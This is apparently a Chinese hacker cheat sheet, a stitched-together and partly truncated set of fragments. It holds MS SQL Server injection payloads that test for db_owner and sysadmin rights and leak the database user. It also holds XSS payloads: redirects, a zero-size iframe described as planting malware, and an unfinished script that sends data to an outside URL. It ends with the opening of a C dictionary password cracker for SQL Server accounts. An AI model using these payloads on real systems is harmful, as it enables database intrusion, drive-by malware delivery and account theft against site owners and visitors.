//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
 and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是

〈script〉alert('******')〈/script〉 
〈meta http-equiv='refresh' content='1;url=http://www.baidu.com'〉  转向代码

〈script language=vbscript〉 window.location.href='http://www.baidu.com' 〈/script〉

指定转象百度！

〈iframe name='I1' src='http://www.baidu.com/' width='0' height='0'〉 〈/iframe〉

挂马

用源码编辑模式在〈/tbody〉前插入跨站代码：
〈script〉windows.open(’http://www.xxxx.com/info.asp?msg=’+d

这篇文章的重点是如何探测MS SQL SERVER账号的密码，下面以一个实例来说明探测密码的全过程。

 　　//程序所用到的头文件 　　//定义全局变量 　　char dict[20000][40]，//准备探测的密码 　　UserName[40]，//用户名 　　target[40]，//目标服务器 　　passwd[40];//已经探测出来的正确密码 　　int total=0;//字典里面单词数量 　　BOOL Cracked=FALSE;//探测密码成功时此值为TRUE 　　// 　　//函数:usage 　　//功能:显示程序帮助信息 　　// 　　void usage() 　　{ 　　printf(